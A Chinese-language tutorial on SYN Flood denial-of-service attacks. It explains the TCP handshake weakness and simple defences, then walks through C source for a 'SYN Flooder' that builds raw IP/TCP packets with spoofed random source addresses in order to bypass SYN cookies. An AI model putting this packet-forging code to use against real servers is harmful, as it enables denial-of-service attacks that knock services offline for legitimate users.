SYN Flood是当前最流行的DoS(拒绝服务攻击)与DdoS(分布式拒绝服务攻击)的方式之一，这是一种利用TCP协议缺陷，发送大量伪造的TCP连接请求，从而使得被攻击方资源耗尽(CPU满负荷或内存不足)的攻击方式。

　　要明白这种攻击的基本原理，还是要从TCP连接建立的过程开始说起：

　　大家都知道，TCP与UDP不同，它是基于连接的，也就是说：为了在服务端和客户端之间传送TCP数据，必须先建立一个虚拟电路，也就是TCP连接，建立TCP连接的标准过程是这样的：

　　首先，请求端(客户端)发送一个包含SYN标志的TCP报文，SYN即同步(Synchronize)，同步报文会指明客户端使用的端口以及TCP连接的初始序号;

　　第二步，服务器在收到客户端的SYN报文后，将返回一个SYN+ACK的报文，表示客户端的请求被接受，同时TCP序号被加一，ACK即确认(Acknowledgement)。

　　第三步，客户端也返回一个确认报文ACK给服务器端，同样TCP序列号被加一，到此一个TCP连接完成。

　　以上的连接过程在TCP协议中被称为三次握手(Three-way Handshake)。

　　问题就出在TCP连接的三次握手中，假设一个用户向服务器发送了SYN报文后突然死机或掉线，那么服务器在发出SYN+ACK应答报文后是无法收到客户端的ACK报文的(第三次握手无法完成)，这种情况下服务器端一般会重试(再次发送SYN+ACK给客户端)并等待一段时间后丢弃这个未完成的连接，这段时间的长度我们称为SYN Timeout，一般来说这个时间是分钟的数量级(大约为30秒-2分钟);一个用户出现异常导致服务器的一个线程等待1分钟并不是什么很大的问题，但如果有一个恶意的攻击者大量模拟这种情况，服务器端将为了维护一个非常大的半连接列表而消耗非常多的资源----数以万计的半连接，即使是简单的保存并遍历也会消耗非常多的CPU时间和内存，何况还要不断对这个列表中的IP进行SYN+ACK的重试。实际上如果服务器的TCP/IP栈不够强大，最后的结果往往是堆栈溢出崩溃---即使服务器端的系统足够强大，服务器端也将忙于处理攻击者伪造的TCP连接请求而无暇理睬客户的正常请求(毕竟客户端的正常请求比率非常之小)，此时从正常客户的角度看来，服务器失去响应，这种情况我们称作：服务器端受到了SYN Flood攻击(SYN洪水攻击)。

　　从防御角度来说，有几种简单的解决方法：

　　第一种是缩短SYN Timeout时间，由于SYN Flood攻击的效果取决于服务器上保持的SYN半连接数，这个值=SYN攻击的频度 x　SYN Timeout，所以通过缩短从接收到SYN报文到确定这个报文无效并丢弃改连接的时间，例如设置为20秒以下(过低的SYN Timeout设置可能会影响客户的正常访问)，可以成倍的降低服务器的负荷。

　　第二种方法是设置SYN Cookie，就是给每一个请求连接的IP地址分配一个Cookie，如果短时间内连续受到某个IP的重复SYN报文，就认定是受到了攻击，以后从这个IP地址来的包会被丢弃。

　　可是上述的两种方法只能对付比较原始的SYN Flood攻击，缩短SYN Timeout时间仅在对方攻击频度不高的情况下生效，SYN Cookie更依赖于对方使用真实的IP地址，如果攻击者以数万/秒的速度发送SYN报文，同时利用SOCK_RAW随机改写IP报文中的源地址，以上的方法将毫无用武之地。

　　二、SYN Flooder源码解读

　　下面我们来分析SYN Flooder的程序实现。

　　首先，我们来看一下TCP报文的格式：

　　如上图所示，一个TCP报文由三个部分构成：20字节的IP首部、20字节的TCP首部与不定长的数据段，(实际操作时可能会有可选的IP选项，这种情况下TCP首部向后顺延)由于我们只是发送一个SYN信号，并不传递任何数据，所以TCP数据段为空。TCP首部的数据结构为：

　　根据TCP报文格式，我们定义一个结构TCP_HEADER用来存放TCP首部：

　　typedef struct _tcphdr

　　{

　　USHORT th_sport;　　//16位源端口

　　USHORT th_dport;　　//16位目的端口

　　unsigned int th_seq;　 //32位序列号

　　unsigned int th_ack;　 //32位确认号

　　unsigned char th_lenres;　//4位首部长度+6位保留字中的4位

　　unsigned char th_flag;　 //2位保留字+6位标志位

　　USHORT th_win;　　 //16位窗口大小

　　USHORT th_sum;　　 //16位校验和

　　USHORT th_urp;　　 //16位紧急数据偏移量

　　}TCP_HEADER;

　　通过以正确的数据填充这个结构并将TCP_HEADER.th_flag赋值为2(二进制的00000010)我们能制造一个SYN的TCP报文，通过大量发送这个报文可以实现SYN Flood的效果。但是为了进行IP欺骗从而隐藏自己，也为了躲避服务器的SYN Cookie检查，还需要直接对IP首部进行操作：

　　同样定义一个IP_HEADER来存放IP首部：

　　typedef struct _iphdr

　　{

　　unsigned char h_verlen;　 //4位首部长度+4位IP版本号

　　unsigned char tos;　　//8位服务类型TOS

　　unsigned short total_len;　//16位总长度(字节)

　　unsigned short ident;　 //16位标识

　　unsigned short frag_and_flags; //3位标志位

　　unsigned char　ttl;　　//8位生存时间 TTL

　　unsigned char proto;　 //8位协议号(TCP, UDP 或其他)

　　unsigned short checksum;　//16位IP首部校验和

　　unsigned int sourceIP;　 //32位源IP地址

　　unsigned int destIP;　 //32位目的IP地址

　　}IP_HEADER;

　　然后通过SockRaw=WSASocket(AF_INET,SOCK_RAW,IPPROTO_RAW,NULL,0,WSA_FLAG_OVERLAPPED));

　　建立一个原始套接口，由于我们的IP源地址是伪造的，所以不能指望系统帮我们计算IP校验和，我们得在在setsockopt中设置IP_HDRINCL告诉系统自己填充IP首部并自己计算校验和：

　　flag=TRUE;

　　setsockopt(SockRaw,IPPROTO_IP,IP_HDRINCL,(char *)&flag,sizeof(int));

　　IP校验和的计算方法是：首先将IP首部的校验和字段设为0(IP_HEADER.checksum=0),然后计算整个IP首部(包括选项)的二进制反码的和，一个标准的校验和函数如下所示：

　　USHORT checksum(USHORT *buffer, int size)

　　{

　　unsigned long cksum=0;

　　while(size >1)

　　{

　　cksum+=*buffer++;

　　size -=sizeof(USHORT);

　　}

　　if(size ) cksum += *(UCHAR*)buffer;

　　cksum = (cksum >> 16) + (cksum & 0xffff);

　　cksum += (cksum >>16);

　　return (USHORT)(~cksum);

　　}

　　这个函数并没有经过任何的优化，由于校验和函数是TCP/IP协议中被调用最多函数之一，所以一般说来，在实现TCP/IP栈时，会根据操作系统对校验和函数进行优化。

　　TCP首部检验和与IP首部校验和的计算方法相同，在程序中使用同一个函数来计算。

　　需要注意的是，由于TCP首部中不包含源地址与目标地址等信息，为了保证TCP校验的有效性，在进行TCP校验和的计算时，需要增加一个TCP伪首部的校验和，定义如下：

　　struct

　　{

　　unsigned long saddr;　//源地址

　　unsigned long daddr;　//目的地址

　　char mbz;　　 //置空

　　char ptcl;　　 //协议类型

　　unsigned short tcpl;　//TCP长度

　　}psd_header;

　　然后我们将这两个字段复制到同一个缓冲区SendBuf中并计算TCP校验和：

　　memcpy(SendBuf,&psd_header,sizeof(psd_header));

　　memcpy(SendBuf+sizeof(psd_header),&tcp_header,sizeof(tcp_header));

　　tcp_header.th_sum=checksum((USHORT *)SendBuf,sizeof(psd_header)+sizeof(tcp_header));

　　计算IP校验和的时候不需要包括TCP伪首部：

　　memcpy(SendBuf,&ip_header,sizeof(ip_header));

　　memcpy(SendBuf+sizeof(ip_header),&tcp_header,sizeof(tcp_header));

　　ip_header.checksum=checksum((USHORT *)SendBuf, sizeof(ip_header)+sizeof(tcp_header));

　　再将计算过校验和的IP首部与TCP首部复制到同一个缓冲区中就可以直接发送了：

　　memcpy(SendBuf,&ip_header,sizeof(ip_header));

　　sendto(SockRaw,SendBuf,datasize,0,(struct sockaddr*) &DestAddr,sizeof(DestAddr));

　　因为整个TCP报文中的所有部分都是我们自己写入的(操作系统不会做任何干涉)，所以我们可以在IP首部中放置随机的源IP地址，如果伪造的源IP地址确实有人使用，他在接收到服务器的SYN+ACK报文后会发送一个RST报文(标志位为00000100)，通知服务器端不需要等待一个无效的连接，可是如果这个伪造IP并没有绑定在任何的主机上，不会有任何设备去通知主机该连接是无效的(这正是TCP协议的缺陷)，主机将不断重试直到SYN Timeout时间后才能丢弃这个无效的半连接。